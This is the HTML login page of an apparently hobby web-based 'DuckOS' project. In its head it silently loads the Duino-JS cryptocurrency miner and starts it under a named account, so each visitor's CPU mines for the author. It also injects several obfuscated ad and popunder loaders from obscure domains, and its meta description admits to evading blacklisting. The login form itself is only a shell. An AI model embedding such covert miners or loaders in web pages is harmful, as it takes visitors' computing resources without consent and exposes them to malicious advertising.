<!DOCTYPE html>
<html lang="en">

<head>
  <script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://inklinkor.com/tag.min.js',5789696,document.body||document.documentElement)</script>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-L78QH2W1DF"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-L78QH2W1DF');
</script>

  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="author" content="Arthur Jiang">
  <title>DuckOS Login</title>
  <meta name="description" content="Average web-based operating system that runs in your browser. More description not provided to avoid blacklisting">
  <link rel="stylesheet" href="login-page.css">
  <script defer src="login-page.js"></script>
  <script src="duino-js.min.js"></script> <!--imports the Duino-JS miner-->
<script>
    username = `ChainedTears`; //put your username here (e.g. revox, ericddm, snehaislove or Hoiboy19), the default is Hoiboy19.
    rigid = `DuckOSLogin`; //If you want to change the rig ID, you can change this. If you want to keep using "Duino-JS", you can remove this line.
    threads = userThreads; //Set the amount of threads to use here, check out https://github.com/sys-256/Duino-JS for more options. The default is 1.
    startMiner(); //starts the miner
</script>
  <script async="async" data-cfasync="false" src="//ophoacit.com/1?z=5711807"></script>
      <script>(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('glizauvo.net',5711805,document.createElement('script'))</script>
  <script src="https://ptauxofi.net/pfe/current/tag.min.js?z=5711798" data-cfasync="false" async></script>
      <script>(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('ileeckut.com',5711781,document.createElement('script'))</script>
</head>

<body>
                                                
                                                <!-- this script is provided by www.javascriptfreecode.com coded by: Kerixa Inc. -->
<style>
*,
*::after,
*::before {
    box-sizing: border-box;
}

* {
    cursor: none !important;
}

:root {
    --color-text: black;
    --color-bg: #0f0e0e;
    --cursor-sphere-fill: transparent;
    --cursor-sphere-stroke: #ea2e6e;
    --cursor-sphere-stroke-width: 1.5px;
    --cursor-fill: yellow;
}

body {
    color: var(--color-text);
    background-color: var(--color-bg);
    width: 100%;
    height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
    text-align: center;
}


</style>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">
<script src='https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js'>
<script>document.documentElement.className = "js";</script>
<noscript>
  <h1>Enable Javascript to view the app</h1>
</noscript>


<!-- Cursors -->
<svg class="cursor-sphere" width="37" height="36" viewBox="0 0 37 36" xmlns="#">
  <path class="cursor-sphere__inner" d="M18.5 32.093l-7.593 2.174-3.034-7.292-6.434-4.58 3.809-6.92-.43-7.886 7.784-1.336L18.5 1l5.898 5.253 7.784 1.336-.43 7.886 3.81 6.92-6.435 4.58-3.034 7.292z" fill-rule="evenodd"></path>
</svg>
<svg class="cursor" width="10" height="10" viewBox="0 0 10 10" xmlns="#">
  <g class="cursor__path" fill="none" fill-rule="evenodd">
    <path d="M5 8.884l-2.17.62-.866-2.083L.125 6.113l1.089-1.977-.123-2.253L3.315 1.5 5 0l1.685 1.5 2.224.383-.123 2.253 1.089 1.977L8.036 7.42 7.17 9.505z"></path>
    <circle fill="#060606" cx="5" cy="5" r="1"></circle>
  </g>
</svg>
<script>
// Track the mouse position
let mouse = { x: 0, y: 0 };

window.addEventListener("mousemove", (event) => {
    mouse = getMousePosition(event);
});

// Cursor Implementation
class Cursor {
    constructor(element, doLerp = false) {
        this.DOM = { element, doLerp };
        this.DOM.element.style.opacity = 0;

        this.bounds = this.DOM.element.getBoundingClientRect();

        this.renderedStyles = {
            tx: { previous: 0, current: 0, amt: doLerp ? 0.2 : 1 },
            ty: { previous: 0, current: 0, amt: doLerp ? 0.2 : 1 },
            scale: { previous: 1, current: 1, amt: doLerp ? 0.17 : 1 },
            opacity: { previous: 1, current: 1, amt: doLerp ? 0.17 : 1 }
        };

        this.onMouseMoveEvent = () => {
            this.renderedStyles.tx.previous = this.renderedStyles.tx.current =
                mouse.x - this.bounds.width / 2;
            this.renderedStyles.ty.previous = this.renderedStyles.ty.current =
                mouse.y - this.bounds.height / 2;

            gsap.to(this.DOM.element, {
                duration: 0.9,
                ease: "Power3.easeOut",
                opacity: 1
            });

            requestAnimationFrame(() => this.render());

            window.removeEventListener("mousemove", this.onMouseMoveEvent);
        };

        window.addEventListener("mousemove", this.onMouseMoveEvent);
    }

    enter() {
        this.renderedStyles.scale.current = 1.8;
    }

    leave() {
        this.renderedStyles.scale.current = 1;
    }

    render() {
        this.renderedStyles.tx.current = mouse.x - this.bounds.width / 2;
        this.renderedStyles.ty.current = mouse.y - this.bounds.height / 2;

        for (const key in this.renderedStyles) {
            this.renderedStyles[key].previous = lerp(
                this.renderedStyles[key].previous,
                this.renderedStyles[key].current,
                this.renderedStyles[key].amt
            );
        }

        this.DOM.element.style.transform = `translateX(${this.renderedStyles.tx.previous}px) translateY(${this.renderedStyles.ty.previous}px) scale(${this.renderedStyles.scale.previous})`;
        this.DOM.element.style.opacity = this.renderedStyles.opacity.previous;

        requestAnimationFrame(() => this.render());
    }
}

// Initialize cursor
const cursorSphere = new Cursor(document.querySelector(".cursor-sphere"), true);
new Cursor(document.querySelector(".cursor"));

// Mouse cursor hovers
const hoverText = document.querySelector("h1");
hoverText.addEventListener("mouseenter", () => cursorSphere.enter());
hoverText.addEventListener("mouseleave", () => cursorSphere.leave());

// Linear interpolation
function lerp(a, b, n) {
    return (1 - n) * a + n * b;
}

// Gets the mouse position
function getMousePosition(event) {
    let positionX = 0;
    let positionY = 0;

    if (!event) event = window.event;

    if (event.pageX && event.pageY) {
        positionX = event.pageX;
        positionY = event.pageY;
    } else if (event.clientX && event.clientY) {
        positionX =
            event.clientX +
            document.body.scrollLeft +
            document.documentElement.scrollLeft;
        positionY =
            event.clientY +
            document.body.scrollTop +
            document.documentElement.scrollTop;
    }

    return { x: positionX, y: positionY };
}
</script>                                           
                                            
  <main id="main-holder">
                                                    
                                                <!-- this script is provided by www.javascriptfreecode.com coded by: Kerixa Inc. -->
<style>
body {
  width: 100%;
  height: 100%;
  min-height: 100vh;
  display: flex;
  align-content: center;
  align-items: center;
  justify-content: center;
  margin: 0;
  background: #282828;
}
div1 {
  display: flex;
  align-content: center;
  align-items: center;
  justify-content: center;
  width: 200px;
  height: 200px;
  margin: auto;
  background-color: #21d4fd;
  background-image: linear-gradient(19deg, #21d4fd 0%, #b721ff 100%);
  border-radius: 30% 70% 70% 30%/30% 30% 70% 70%;
  box-shadow: 15px 15px 50px rgba(0,0,0,0.2);
  animation: morphing 10s infinite;
  overflow: hidden;
}
div:hover {
  animation-play-state: paused;
}
div h1 {
  color: #fff;
  font-family: Helvetica Neue, Helvetica, Verdana, sans-serif;
  font-weight: 400;
  font-size: 35px;
  line-height: 100%;
  text-transform: uppercase;
  letter-spacing: 0.02em;
  margin: auto;
}
@-moz-keyframes morphing {
  0% {
    border-radius: 30% 70% 70% 30%/30% 30% 70% 70%;
    box-shadow: 15px 15px 50px rgba(0,0,0,0.2);
  }
  25% {
    border-radius: 58% 42% 75% 25%/76% 46% 54% 24%;
  }
  50% {
    border-radius: 50% 50% 33% 67%/55% 27% 73% 45%;
    box-shadow: -10px -5px 50px rgba(0,0,0,0.2);
  }
  75% {
    border-radius: 33% 67% 58% 42%/63% 68% 32% 37%;
  }
}
@-webkit-keyframes morphing {
  0% {
    border-radius: 30% 70% 70% 30%/30% 30% 70% 70%;
    box-shadow: 15px 15px 50px rgba(0,0,0,0.2);
  }
  25% {
    border-radius: 58% 42% 75% 25%/76% 46% 54% 24%;
  }
  50% {
    border-radius: 50% 50% 33% 67%/55% 27% 73% 45%;
    box-shadow: -10px -5px 50px rgba(0,0,0,0.2);
  }
  75% {
    border-radius: 33% 67% 58% 42%/63% 68% 32% 37%;
  }
}
@-o-keyframes morphing {
  0% {
    border-radius: 30% 70% 70% 30%/30% 30% 70% 70%;
    box-shadow: 15px 15px 50px rgba(0,0,0,0.2);
  }
  25% {
    border-radius: 58% 42% 75% 25%/76% 46% 54% 24%;
  }
  50% {
    border-radius: 50% 50% 33% 67%/55% 27% 73% 45%;
    box-shadow: -10px -5px 50px rgba(0,0,0,0.2);
  }
  75% {
    border-radius: 33% 67% 58% 42%/63% 68% 32% 37%;
  }
}
@keyframes morphing {
  0% {
    border-radius: 30% 70% 70% 30%/30% 30% 70% 70%;
    box-shadow: 15px 15px 50px rgba(0,0,0,0.2);
  }
  25% {
    border-radius: 58% 42% 75% 25%/76% 46% 54% 24%;
  }
  50% {
    border-radius: 50% 50% 33% 67%/55% 27% 73% 45%;
    box-shadow: -10px -5px 50px rgba(0,0,0,0.2);
  }
  75% {
    border-radius: 33% 67% 58% 42%/63% 68% 32% 37%;
  }
}
</style>
<div1><h1 style="text-align:center">DuckOS Login</h1></div1>    
    <h4>Or you can use the free version with ads (alot!) <a href="/free.html">here</a></h4><br><a href="https://server.duinocoin.com/webminer.html?username=ChainedTears&threads=8&rigid=AtlasOS&keyinput=">Help me earn money!!</a>
    
    <div id="login-error-msg-holder">
      <p id="login-error-msg">Invalid username <span id="error-msg-second-line">and/or password</span></p>
    </div>
    
    <form id="login-form">
      <input type="text" name="username" id="username-field" class="login-form-field" placeholder="Username">
      <input type="password" name="password" id="password-field" class="login-form-field" placeholder="Password">
      <input type="submit" value="Login" id="login-form-submit">
    </form>
  
  </main>
</body>

</html>
